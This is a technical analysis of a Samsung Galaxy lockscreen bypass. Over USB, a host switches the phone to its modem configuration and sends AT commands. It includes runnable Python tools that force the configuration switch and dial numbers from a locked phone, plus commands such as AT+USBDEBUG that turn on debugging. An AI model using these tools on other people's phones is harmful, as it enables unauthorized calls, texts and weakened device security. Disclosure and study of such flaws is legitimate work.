Technical analysis: Samsung Galaxy lockscreen bypass, locked phones can be made to place calls
Two security researchers, Roberto Paleari and Aristide Fattori, recently published technical details of a weakness in Samsung Galaxy devices: while a Galaxy phone is locked, an unauthorized third party with physical access to it can make it place calls and send text messages.
Overview of lock bypass
According to the details published by Roberto Paleari and Aristide Fattori, an attacker with temporary physical access to a device (or a stolen phone) connects it over USB to a Linux host and issues commands that make the phone place calls and send text messages.
The technique exploits no software vulnerability. It works even when USB debugging (ADB, the Android Debug Bridge, which lets a host manage a device or emulator) and USB tethering are disabled on the phone.
How it works
The core of the issue is that when the phone is connected over USB to a Linux host, the host can talk to it through a virtual USB serial port (typically the /dev/ttyACM0 device).
In testing, a Samsung Galaxy phone plugged into a USB host controller (an ordinary laptop, for example) exposes a serial interface, and through that interface the host can communicate with the phone's USB modem.
"Easy" mode (for old Samsung mobile phones and firmware versions)
On older Samsung phones and firmware, such as the GT-I9192 (Galaxy S4 Mini) with firmware I9192XXUBNB1, after connecting the phone to a Linux host and confirming that the exposed interface is the USB modem, you can simply start sending AT (Attention) commands. According to the analysis, some of these commands are passed through to the baseband modem, while others are handled by a user-space application on the Android side.
The interface carries plain AT commands, so in principle a skilled attacker can drive a range of operations on the device through it.
Freebuf encyclopedia
AT stands for Attention; the AT command set was invented by Hayes to let a computer or terminal control a modem. On a mobile phone, AT commands control mobile-station functions and interact with GSM network services: calls, text messages, the phone book, data services and fax.
Hard Mode (for new Samsung mobile phones and firmware versions)
On recent firmware (such as the latest Samsung S4 and S6 builds), exploitation is not that simple: by default, when the device is connected to a host only the MTP interface, used for file transfer, is enabled.
In testing, however, an attacker can still reach the modem by switching the device from its default configuration to its second USB configuration. In this case the attacker must switch to USB configuration #2 before talking to the modem, and the switch can be done from the PC without unlocking the phone. The default configuration, as reported by lsusb, is shown below (note bNumConfigurations 2 and the CDC ACM interface in the second configuration descriptor):
$ lsusb -v
...
Bus 001 Device 007: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy (MTP)
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x04e8 Samsung Electronics Co., Ltd
  idProduct          0x6860 Galaxy (MTP)
  ...
  bNumConfigurations      2
  Configuration Descriptor:
    ...
    Interface Descriptor:
      bLength                 9
      bDescriptorType         4
      bInterfaceNumber        0
      bAlternateSetting       0
      bNumEndpoints           3
      bInterfaceClass         6 Imaging
      bInterfaceSubClass      1 Still Image Capture
      bInterfaceProtocol      1 Picture Transfer Protocol (PIMA 15470)
      iInterface              5 MTP
    ...
  Configuration Descriptor:
    bLength                 9
    bDescriptorType         2
    wTotalLength          105
    bNumInterfaces          3
    bConfigurationValue     2
    iConfiguration          0
    bmAttributes         0xc0
      Self Powered
    MaxPower               96mA
    ...
    Interface Descriptor:
      bLength                 9
      bDescriptorType         4
      bInterfaceNumber        1
      bAlternateSetting       0
      bNumEndpoints           1
      bInterfaceClass         2 Communications
      bInterfaceSubClass      2 Abstract (modem)
      bInterfaceProtocol      1 AT-commands (v.25ter)
      iInterface              6 CDC Abstract Control Model (ACM)
    ...
For their PoC, the researchers wrote a small C tool called usbswitcher that switches a specified Samsung device to USB configuration #2. It is built on the libusb library; the same task can also be done through the /sys/bus/usb virtual file system.
Forcing the phone to switch configuration is done by first resetting the USB device (the tool's usb_reset() function) and then selecting the configuration (its set_configuration() function). The first run of usbswitcher sometimes has no effect, so it is best to run it twice and confirm that the configuration has actually changed (for example with lsusb, checking that the CDC ACM interface is now active and /dev/ttyACM0 has appeared). The tool's source is published as usbswitcher.c.
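The following is an added example of the /sys/bus/usb route mentioned above, not the researchers' usbswitcher code: it locates attached devices with Samsung's idVendor 04e8, forces a re-enumeration by toggling the device's sysfs "authorized" attribute (this example's substitute for usb_reset(); the kernel drops the MTP binding when the device is de-authorized), then writes the desired bConfigurationValue, retrying once as the article recommends. It must run as root on the Linux host. The make_fake_sysfs() helper builds a constructed stand-in for the sysfs tree so the logic can be exercised without a phone; the attribute names it creates are the real ones the kernel exposes.

```python
"""Switch a Samsung Galaxy from its default MTP-only USB configuration to
configuration #2 (the one carrying the CDC ACM modem interface) through the
/sys/bus/usb virtual file system instead of libusb. Needs root on the host."""
import os
import sys
import tempfile
import time

SAMSUNG_VENDOR = "04e8"   # idVendor shared by every device in the impact list
MODEM_CONFIG = 2          # bConfigurationValue of the ACM-bearing configuration


def read_attr(dev, attr):
    with open(os.path.join(dev, attr)) as f:
        return f.read().strip()


def write_attr(dev, attr, value):
    with open(os.path.join(dev, attr), "w") as f:
        f.write(f"{value}\n")


def find_devices(sysfs_root="/sys/bus/usb/devices", vendor=SAMSUNG_VENDOR):
    """sysfs directories of attached devices whose idVendor matches."""
    hits = []
    for name in sorted(os.listdir(sysfs_root)):
        dev = os.path.join(sysfs_root, name)
        if not os.path.isfile(os.path.join(dev, "idVendor")):
            continue  # interface entries such as 1-1:1.0 carry no idVendor
        if read_attr(dev, "idVendor").lower() == vendor:
            hits.append(dev)
    return hits


def reset_device(dev, settle=0.5):
    """Stand-in for usbswitcher's usb_reset(): de-authorizing and then
    re-authorizing the device makes the kernel re-enumerate it, which also
    unbinds the MTP driver holding the default configuration (assumption:
    the short settle delay is enough for re-enumeration to finish)."""
    write_attr(dev, "authorized", 0)
    write_attr(dev, "authorized", 1)
    time.sleep(settle)


def switch_configuration(dev, config=MODEM_CONFIG, attempts=2):
    """Reset, then select bConfigurationValue; two attempts because the
    first run of usbswitcher sometimes does not take effect either."""
    if int(read_attr(dev, "bNumConfigurations")) < config:
        raise ValueError(f"{dev}: device has no configuration #{config}")
    for _ in range(attempts):
        reset_device(dev)
        write_attr(dev, "bConfigurationValue", config)
        if int(read_attr(dev, "bConfigurationValue")) == config:
            return True
    return False


def make_fake_sysfs():
    """Constructed stand-in for /sys/bus/usb/devices (not real hardware):
    one Galaxy in MTP mode (config 1), its interface entry, and a hub."""
    root = tempfile.mkdtemp(prefix="fake-sysfs-")
    galaxy = os.path.join(root, "1-1")
    os.makedirs(galaxy)
    for attr, value in {"idVendor": "04e8", "idProduct": "6860",
                        "bNumConfigurations": "2", "bConfigurationValue": "1",
                        "authorized": "1"}.items():
        write_attr(galaxy, attr, value)
    os.makedirs(os.path.join(root, "1-1:1.0"))
    hub = os.path.join(root, "1-2")
    os.makedirs(hub)
    write_attr(hub, "idVendor", "1d6b")
    return root, galaxy


if __name__ == "__main__":
    # usage: sudo python3 sysfs_switch.py            (real sysfs)
    #        python3 sysfs_switch.py <fake-root>     (constructed tree)
    root = sys.argv[1] if len(sys.argv) > 1 else "/sys/bus/usb/devices"
    devices = find_devices(root)
    if not devices:
        sys.exit("no Samsung device attached")
    for dev in devices:
        ok = switch_configuration(dev)
        print(dev, "->", read_attr(dev, "bConfigurationValue"), "ok" if ok else "FAILED")
```

After a successful switch the kernel's cdc_acm driver binds the modem interface and /dev/ttyACM0 appears; if it does not, check dmesg for the re-enumeration and repeat the switch, as the article advises for usbswitcher.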
Test Results
The most obvious consequence of reaching the modem is the ability to place calls and send text messages. For the former, an outgoing call, the command is:
ATD+123456;
This dials the number 123456 while the phone is locked. Some readers asked whether the weakness could be used to gain access to the device's data, such as the address book, photos or internal storage. In principle AT commands are handled by the baseband processor, which only controls the modem; as mentioned earlier, some commands are instead parsed by user-space applications on the Android side. Neither path gives direct access to the data listed above.
In testing, the S4 mini with firmware I9192XXUBNB1 accepted several AT commands that change Android system settings: for example, AT+USBDEBUG turns on USB debugging and AT+WIFIVALUE turns Wi-Fi on or off.
On recent firmware Samsung appears to have recognised the risk of such commands and introduced a blacklist-based filter (enforced by the ddexe binary) that drops dangerous commands. When AT+USBDEBUG was sent to a Galaxy S6 during testing, the system log recorded the following:
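The following is an added example, not the researchers' code, showing the host side of the AT exchange described in this section: it opens the CDC ACM tty raw, sends CR-terminated commands, and collects output until a V.25ter final result code (OK, ERROR, NO CARRIER, ...) arrives. build_dial_command() constructs the ATD+<number>; string and rejects anything that is not a dial string, so a caller cannot smuggle a second command into it. The fake_galaxy_modem() function is a constructed stand-in for the phone, used only so the exchange can run offline; its behaviour (echo, OK for AT/ATD, ERROR for a blacklisted AT+USBDEBUG) is an assumption modelled on the article, not an observation of real Samsung firmware.

```python
"""Talk AT to a Galaxy's CDC ACM interface (/dev/ttyACM0) from a Linux host.
open_modem/at_exchange/parse_response are the real transport; fake_galaxy_modem
is a constructed phone-side stand-in so the exchange can run with no device."""
import os
import select
import socket
import sys
import threading
import time
import tty

FINAL_CODES = ("OK", "ERROR", "NO CARRIER", "BUSY", "NO ANSWER")


def build_dial_command(number):
    """ATD<number>; -- the trailing ';' requests a voice call (V.25ter)."""
    number = number.strip()
    if not number or not all(c.isdigit() or c in "+*#" for c in number):
        raise ValueError(f"invalid dial string: {number!r}")
    return f"ATD{number};"


def parse_response(raw):
    """Split modem output into (final_result_code, preceding_lines);
    the code is None while the response is still incomplete."""
    lines = [l.strip() for l in raw.replace("\r", "\n").split("\n") if l.strip()]
    for i, line in enumerate(lines):
        if line in FINAL_CODES or line.startswith(("+CME ERROR", "+CMS ERROR")):
            return line, lines[:i]
    return None, lines


def open_modem(path="/dev/ttyACM0"):
    """Open the ACM tty in raw mode so the line discipline leaves the CRs alone."""
    fd = os.open(path, os.O_RDWR | os.O_NOCTTY)
    tty.setraw(fd)
    return fd


def at_exchange(fd, command, timeout=3.0):
    """Send one AT command, read until a final result code or the timeout."""
    os.write(fd, (command + "\r").encode("ascii"))
    buf = b""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        readable, _, _ = select.select([fd], [], [], 0.1)
        if not readable:
            continue
        chunk = os.read(fd, 4096)
        if not chunk:
            break
        buf += chunk
        status, lines = parse_response(buf.decode("ascii", "replace"))
        if status is not None:
            return status, lines
    return None, parse_response(buf.decode("ascii", "replace"))[1]


def fake_galaxy_modem(fd, blocked=("AT+USBDEBUG",)):
    """Constructed phone side (assumed behaviour, not real firmware): echoes
    the command, OK for AT/ATD, ERROR for blacklisted or unknown commands."""
    buf = b""
    while True:
        chunk = os.read(fd, 4096)
        if not chunk:
            return
        buf += chunk
        while b"\r" in buf:
            line, buf = buf.split(b"\r", 1)
            cmd = line.decode("ascii", "replace").strip()
            if not cmd:
                continue
            ok = cmd.upper() not in blocked and (cmd.upper() == "AT" or cmd.upper().startswith("ATD"))
            os.write(fd, f"{cmd}\r\n{'OK' if ok else 'ERROR'}\r\n".encode("ascii"))


def offline_demo():
    """Run the exchange against the fake modem over a socketpair; returns {command: status}."""
    host, phone = socket.socketpair()
    worker = threading.Thread(target=fake_galaxy_modem, args=(phone.fileno(),), daemon=True)
    worker.start()
    results = {}
    for cmd in ("AT", build_dial_command("+123456"), "AT+USBDEBUG"):
        status, _ = at_exchange(host.fileno(), cmd)
        results[cmd] = status
    host.close()
    worker.join(timeout=2)
    return results


if __name__ == "__main__":
    # usage: python3 at_session.py                  -> offline stand-in
    #        python3 at_session.py /dev/ttyACM0 [number]
    if len(sys.argv) < 2:
        print(offline_demo())
    else:
        modem = open_modem(sys.argv[1])
        print(at_exchange(modem, "AT"))
        if len(sys.argv) > 2:
            print(at_exchange(modem, build_dial_command(sys.argv[2])))
```

Against a real device the first thing to check is that a bare AT returns OK; if it times out, the interface is not the modem (or the configuration switch did not stick). Note that a real modem echoes commands by default, so the preceding_lines list returned by at_exchange() usually starts with the command itself.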
D/DataRouter(  302): write [151] bytes of data to USB fd [9]
D/DataRouter(  302): After the usb select
D/DataRouter(  302): read usb data [len: 12]
D/DataRouter(  302): read usb data message: AT+USBDEBUG
D/DataRouter(  302): Not allowed AT cmd !!
D/DataRouter(  302): Before the usb select
The "Not allowed AT cmd" line is the filter rejecting the command.
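When checking which commands a given firmware's filter actually rejects, it is convenient to send a batch over the ACM interface and read the verdicts back from adb logcat -s DataRouter (or a bug report). The following is an added helper for that, not part of the article or of any Samsung tool: it pairs each "read usb data message:" line with a following "Not allowed AT cmd" line. The SAMPLE_LOG is constructed; its first six lines are the Galaxy S6 lines shown above, and the AT+WIFIVALUE=1 lines that follow are invented (the real syntax of that command is not given in the article). A command without a rejection line is reported as passed through to DataRouter's normal handling, which is an assumption: the article shows only the blocked path.

```python
"""Extract AT commands and blacklist verdicts from DataRouter logcat output."""
import re

LINE_RE = re.compile(r"^D/DataRouter\s*\(\s*\d+\s*\):\s*(?P<msg>.*)$")
CMD_RE = re.compile(r"^read usb data message:\s*(?P<cmd>\S.*?)\s*$")

# Constructed sample: lines 1-6 are the Galaxy S6 log from the article,
# the AT+WIFIVALUE=1 lines are invented to show a command that is not rejected.
SAMPLE_LOG = """\
D/DataRouter(  302): write [151] bytes of data to USB fd [9]
D/DataRouter(  302): After the usb select
D/DataRouter(  302): read usb data [len: 12]
D/DataRouter(  302): read usb data message: AT+USBDEBUG
D/DataRouter(  302): Not allowed AT cmd !!
D/DataRouter(  302): Before the usb select
D/DataRouter(  302): read usb data [len: 15]
D/DataRouter(  302): read usb data message: AT+WIFIVALUE=1
D/DataRouter(  302): write [6] bytes of data to USB fd [9]
"""


def parse_datarouter(text):
    """Return [(command, blocked), ...] in log order. blocked is True when a
    'Not allowed AT cmd' line follows the command before the next command;
    otherwise the command is assumed to have passed the blacklist."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other tags, or logcat noise
        msg = m.group("msg")
        c = CMD_RE.match(msg)
        if c:
            events.append([c.group("cmd"), False])
        elif msg.startswith("Not allowed AT cmd") and events:
            events[-1][1] = True
    return [tuple(e) for e in events]


def blocked_commands(text):
    return [cmd for cmd, blocked in parse_datarouter(text) if blocked]


def passed_commands(text):
    return [cmd for cmd, blocked in parse_datarouter(text) if not blocked]


if __name__ == "__main__":
    # usage: adb logcat -d -s DataRouter | python3 datarouter_verdicts.py
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for cmd, blocked in parse_datarouter(text):
        print(f"{'BLOCKED' if blocked else 'passed '}  {cmd}")
```

Run it once per firmware build under test; the difference between the two lists is the effective blacklist, which is what determines whether the settings-changing commands seen on the S4 mini still work on a newer device.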
Impact Scope
The devices tested so far on which the operations described above succeed are:
SM-G920F, version No.: G920FXXU2COH2 (Galaxy S6)
SM-N9005, version No.: N9005XXUGBOK6 (Galaxy Note 3)
GT-I9192, version No.: I9192XXUBNB1 (Galaxy S4 mini)
GT-I9195, version No.: I9195XXUCOL1 (Galaxy S4 mini LTE)
GT-I9505, version No.: I9505XXUHOJ2 (Galaxy S4)